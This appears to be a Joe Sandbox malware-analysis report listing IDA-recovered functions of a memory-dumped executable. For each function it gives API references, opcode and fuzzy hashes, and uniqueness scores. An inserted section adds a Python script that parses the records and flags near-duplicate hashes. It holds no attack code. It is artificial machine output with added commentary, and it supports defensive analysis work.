                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 6993618426fa66f240d95209d40ec45346f9fd7bf31bce7c3654913893fbbcba
                                                                                              • Instruction ID: 696344d3e2885b47f6512fa6ace8ef72347f9f9236a567bad206f50ce49fcd03
                                                                                              • Opcode Fuzzy Hash: 6993618426fa66f240d95209d40ec45346f9fd7bf31bce7c3654913893fbbcba
                                                                                              • Instruction Fuzzy Hash: FFC01232458500BECF120B70DC09D2A7BECAB94312F50C918F0A9C1060C279C050DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 003112C1
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 003112C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: 10400d367a25365db2aeed6964693a08bc632be6edfbff43f0a07d031b95f1e0
                                                                                              • Instruction ID: 1224b443c0039c8ba9727fa6bbec9354b08527e3f2b9b64947b3af834258242b
                                                                                              • Opcode Fuzzy Hash: 10400d367a25365db2aeed6964693a08bc632be6edfbff43f0a07d031b95f1e0
                                                                                              • Instruction Fuzzy Hash: 3DC04C76408640BFCF165BB49D0CD2FBFBDAB94312F90CD1DB1A981020C6758450DF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 907964f9e5adb1575e764a17139ecd6de61234b919642915e3431c6804d567ce
                                                                                              • Instruction ID: 49f4e60e9b1332288f71a4ba12d87d524240f282be6fbf653e9ab35424b8d1ef
                                                                                              • Opcode Fuzzy Hash: 907964f9e5adb1575e764a17139ecd6de61234b919642915e3431c6804d567ce
                                                                                              • Instruction Fuzzy Hash: 6EC1A474A002549BDF2ACF68C4847ED7BA59F4E310F1905B9ED059F396CB709AC4CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen
                                                                                              • String ID:
                                                                                              • API String ID: 4218353326-0
                                                                                              • Opcode ID: 941bfae615688ee32bbd6900b3b070fa22ea946234ba2437a9a814970aadf6c0
                                                                                              • Instruction ID: faae23804e082260a7337c4050a03e9eea8c6a280859d14f4ce22a7eea4f6c54
                                                                                              • Opcode Fuzzy Hash: 941bfae615688ee32bbd6900b3b070fa22ea946234ba2437a9a814970aadf6c0
                                                                                              • Instruction Fuzzy Hash: CD51B973504358ABD726AAA0DC81FDBB3ECFF48304F04492AF699D7142EA31E55987A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8cea11cbc13c286d0cfd6ab92c95bfab1b0167a567a4546e5bfad28b3a7be7f1
                                                                                              • Instruction ID: 3100bf16fca40fa1edb43400bad6fb543656f23dd5d57deace39fecf02192b92
                                                                                              • Opcode Fuzzy Hash: 8cea11cbc13c286d0cfd6ab92c95bfab1b0167a567a4546e5bfad28b3a7be7f1
                                                                                              • Instruction Fuzzy Hash: BD71D2B1504B859FCB2BEB74D851AE7B7E9BF09300F04092EE2AB47181DB71B694DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003190A7
                                                                                                • Part of subcall function 003113F8: __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00312032: __EH_prolog.LIBCMT ref: 00312037
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: 15d84a3a29397f40c9bc216db672b05ab3c8b95a959b942dff72c15a5415a4e7
                                                                                              • Instruction ID: 17af664f8d6273fb671942a3ebecee55a4b335eb9d5724bbd83b036bec832724
                                                                                              • Opcode Fuzzy Hash: 15d84a3a29397f40c9bc216db672b05ab3c8b95a959b942dff72c15a5415a4e7
                                                                                              • Instruction Fuzzy Hash: 904197719042586EDB2ADB60CCA5BEAB379BF18340F4404EAF54A5B082DB756FC9CF10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00316891: __EH_prolog.LIBCMT ref: 00316896
                                                                                                • Part of subcall function 0031E298: __EH_prolog.LIBCMT ref: 0031E29D
                                                                                                • Part of subcall function 0031644D: __EH_prolog.LIBCMT ref: 00316452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 4fc323764ce05d3541af58bb3a4a453900bf0398bc7e6447040015835c4c1864
                                                                                              • Instruction ID: ef7b446864e4d628e65bb8f82079a0cdf794f6f3d22c8fcfb28cce55805e77c0
                                                                                              • Opcode Fuzzy Hash: 4fc323764ce05d3541af58bb3a4a453900bf0398bc7e6447040015835c4c1864
                                                                                              • Instruction Fuzzy Hash: DA5137B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF69BD7715254CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00316891: __EH_prolog.LIBCMT ref: 00316896
                                                                                                • Part of subcall function 0031E298: __EH_prolog.LIBCMT ref: 0031E29D
                                                                                                • Part of subcall function 0031644D: __EH_prolog.LIBCMT ref: 00316452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 9742582207bd054120b0fbcb0f00d5475d86441cfc5e3a692ea8d5407a713bcc
                                                                                              • Instruction ID: 6737a37156496039312f003b75ccdabf022767d85b0b5cefac6145911216badb
                                                                                              • Opcode Fuzzy Hash: 9742582207bd054120b0fbcb0f00d5475d86441cfc5e3a692ea8d5407a713bcc
                                                                                              • Instruction Fuzzy Hash: 635135B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF68BDB711254CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
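The records above list, per recovered function, the API references the Joe Sandbox IDA plugin found and a set of fingerprints (API String ID, Opcode ID, Instruction Fuzzy Hash). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses such records out of the report text and flags functions whose Instruction Fuzzy Hashes are nearly identical, as with the two functions just above that both reference `__EH_prolog` at 003113FD and whose hashes differ in only six hex positions. The three sample records are constructed by copying lines from this report; positional nibble comparison and the 0.85 threshold are assumptions made for the example, since Joe Sandbox's own similarity metric is not described on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed input: three records copied from this report's APIs and Similarity
# blocks, trimmed to the lines the parser consumes (records 0 and 1 are the pair
# that both list __EH_prolog at 003113FD).
SAMPLE_REPORT = """
APIs
• __EH_prolog.LIBCMT ref: 003113FD
  • Part of subcall function 00316891: __EH_prolog.LIBCMT ref: 00316896
Similarity
• API ID: H_prolog
• API String ID: 3519838083-0
• Instruction Fuzzy Hash: DA5137B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF69BD7715254CB62

APIs
• __EH_prolog.LIBCMT ref: 003113FD
Similarity
• API ID: H_prolog
• API String ID: 3519838083-0
• Instruction Fuzzy Hash: 635135B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF68BDB711254CB62

APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 0033BEB8
Similarity
• API ID: AddressProc
• API String ID: 190572456-0
• Instruction Fuzzy Hash: 80119133A006259FDB279E6CFC8099AB3A99B85760F174220EF55AB654DB31EC41CBD0
"""

# An APIs entry reads "Name.MODULE(args), ref: ADDR"; entries prefixed with
# "Part of subcall function" are calls made by a callee, not by this function.
API_LINE = re.compile(r"^•\s*(?P<sub>Part of subcall function \w+:\s*)?"
                      r"(?P<name>\w+)\.(?P<module>\w+).*?ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_LINE = re.compile(r"^•\s*(?P<key>API ID|API String ID|Opcode ID|Instruction ID|"
                        r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<value>.*)$")
HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str
    via_subcall: bool

@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)   # ApiCall entries in report order
    fields: dict = field(default_factory=dict)  # Similarity IDs and hashes by label

def parse_records(text: str) -> list:
    """One FuncRecord per 'APIs' block; also works on the full report text."""
    records, cur, in_apis = [], None, False
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            cur, in_apis = FuncRecord(), True
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line in HEADERS:
            in_apis = False
        elif in_apis:
            m = API_LINE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"] is not None))
        else:
            m = FIELD_LINE.match(line)
            if m:
                cur.fields[m["key"]] = m["value"].strip()
    return records

def nibble_distance(a: str, b: str) -> int:
    """Hex positions at which two equal-length fuzzy hashes differ. Positional
    comparison is an assumption for this example, not Joe Sandbox's own metric."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes of different length are not comparable")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))

def nibble_similarity(a: str, b: str) -> float:
    """1.0 for identical hashes, 0.0 when every position differs."""
    return 1.0 - nibble_distance(a, b) / len(a) if a else 0.0

def near_duplicates(records: list, threshold: float = 0.85) -> list:
    """(i, j, similarity) for pairs whose hashes agree in >= threshold of positions."""
    pairs = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            hi = records[i].fields.get("Instruction Fuzzy Hash", "")
            hj = records[j].fields.get("Instruction Fuzzy Hash", "")
            if hi and hj and len(hi) == len(hj):
                s = nibble_similarity(hi, hj)
                if s >= threshold:
                    pairs.append((i, j, s))
    return sorted(pairs, key=lambda p: -p[2])

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for i, j, s in near_duplicates(recs):
        print(f"record {i} ~ record {j}: similarity {s:.3f}")
```

Run against the full report text instead of the embedded sample, the same parser pivots on API String ID and Instruction Fuzzy Hash across every function block, which is how one would spot library boilerplate (the `__EH_prolog` wrappers) versus the handful of functions worth opening in a disassembler.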

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032C21C
                                                                                                • Part of subcall function 003113F8: __EH_prolog.LIBCMT ref: 003113FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: a247bac70b7538574fcef40bb1754ea2d94aea3e12c838bfee4fc57e210a74ca
                                                                                              • Instruction ID: 45fbd68240397fb86d459e6c9f7f48edf316f9f413d6a5a340444dcd31d985f4
                                                                                              • Opcode Fuzzy Hash: a247bac70b7538574fcef40bb1754ea2d94aea3e12c838bfee4fc57e210a74ca
                                                                                              • Instruction Fuzzy Hash: B7216B71C04329EECF16DF94D8819EEBBB4BF09304F0004AAE805BB641DB756B45EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0033BEB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 42abfb5ad8fe07544b71222b0bf57c552cfa50386475a16014b68d0e5d005847
                                                                                              • Instruction ID: 0b517542cf08b36e4bdad4a964534c34316d3a269d7fede7b30e7f50caa23ad2
                                                                                              • Opcode Fuzzy Hash: 42abfb5ad8fe07544b71222b0bf57c552cfa50386475a16014b68d0e5d005847
                                                                                              • Instruction Fuzzy Hash: 80119133A006259FDB279E6CFC8099AB3A99B85760F174220EF55AB654DB31EC41CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 52df85daefae9a2223169f833bd13278fc3f366d60238c4581e9736e782994a6
                                                                                              • Instruction ID: 27ce7f750d3c7cc8c9cd5e1f9386430bcffd8ace6cad5589faa967e8b9401e3b
                                                                                              • Opcode Fuzzy Hash: 52df85daefae9a2223169f833bd13278fc3f366d60238c4581e9736e782994a6
                                                                                              • Instruction Fuzzy Hash: 1511E336D019299BCB2BEF69C885AFEB375AF4C700F024129FC15AB341DB74DD808691
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032EBA7
                                                                                                • Part of subcall function 00321983: _wcslen.LIBCMT ref: 00321999
                                                                                                • Part of subcall function 00318823: __EH_prolog.LIBCMT ref: 00318828
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: b9b3ddc639cdf771a71b5f057ea1bcbf8e2468df8f1e9b0f0151a63055cc6916
                                                                                              • Instruction ID: 9193a3af531a293c93a7cd4e27411198009b7dfc82a8871bf5239b4df2c17be4
                                                                                              • Opcode Fuzzy Hash: b9b3ddc639cdf771a71b5f057ea1bcbf8e2468df8f1e9b0f0151a63055cc6916
                                                                                              • Instruction Fuzzy Hash: B711C875A182909ED717EBA8EC067DC7FF89B15310F00806AE0449B292DBF51684CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0033C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033C337
                                                                                              • _free.LIBCMT ref: 0033D6A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033C337
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0031A83D,?,?,?,?,?,0034380F,000000FF), ref: 0031A89B
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0031BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BABD
  • Part of subcall function 0031BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAEB
  • Part of subcall function 0031BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAF7
• FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
Memory Dump Source
